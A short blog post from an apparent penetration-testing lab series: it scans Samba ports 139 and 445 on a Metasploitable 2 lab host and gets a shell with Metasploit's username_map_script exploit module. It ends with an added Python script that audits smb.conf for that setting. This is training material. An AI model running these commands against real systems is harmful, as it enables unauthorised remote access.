Metasploitable 2: Ports 139, 445

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
2 min read, Apr 30, 2019

This is part V of the Metasploitable 2 series. In part I the lab was prepared, in part II we tested port 21, in part III we tested port 25, in part IV it was port 80. You can follow these articles here.

In this part we’re going to scan SAMBA ports 139 and 445.

SAMBA is the open source implementation of the Windows file sharing protocol (SMB). Let's find out more about the service running behind these ports, starting with an nmap scan:

> db_nmap -sV -p 139,445 192.168.231.109

And now use a scanner module:

> use auxiliary/scanner/smb/smb_version

> show options

> run

We got Samba version 3.0.20. Now search through SearchSploit:

There is our attack vector. Go back to MSF and search for the module with:

> grep samba search username map script

> use exploit/multi/samba/username_map_script

> show options

> run

Execute and obtain shell:

Conclusion

In this article we scanned for SAMBA, found the version running, determined it was exploitable and obtained a shell.
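From the defender's side, the module used above takes its name from the `username map script` parameter in smb.conf, so a host audit can start by checking whether that parameter is set. The following is an added example, not code from the original article; the sample configurations, paths and function names are constructed for illustration.

```python
import re

# Constructed sample configurations (not taken from the article's lab host).
SAMPLE_WEAK = """\
[global]
   workgroup = WORKGROUP
   ; mapping helper enabled
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAMPLE_HARDENED = """\
[global]
   workgroup = WORKGROUP
   # username map script = /etc/samba/scripts/mapusers.sh
"""

def normalize(name):
    # smb.conf ignores case and whitespace in section and parameter names.
    return re.sub(r"\s+", "", name).lower()

def parse_smb_conf(text):
    """Yield (section, parameter, value, line_number) for every setting."""
    section, buffered = None, ""
    for number, raw in enumerate(text.splitlines(), 1):
        line = buffered + raw.strip()
        if line.endswith("\\"):          # trailing backslash continues the line
            buffered = line[:-1]
            continue
        buffered = ""
        if not line or line[0] in "#;":  # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = normalize(line[1:-1])
        elif "=" in line:
            name, value = line.split("=", 1)
            yield section, normalize(name), value.strip(), number

def find_username_map_script(text):
    """Return (section, value, line_number) where the option is set."""
    return [(s, v, n) for s, p, v, n in parse_smb_conf(text)
            if p == "usernamemapscript" and v]

if __name__ == "__main__":
    for label, conf in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        hits = find_username_map_script(conf)
        print(label, "->", hits or "username map script not set")
```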
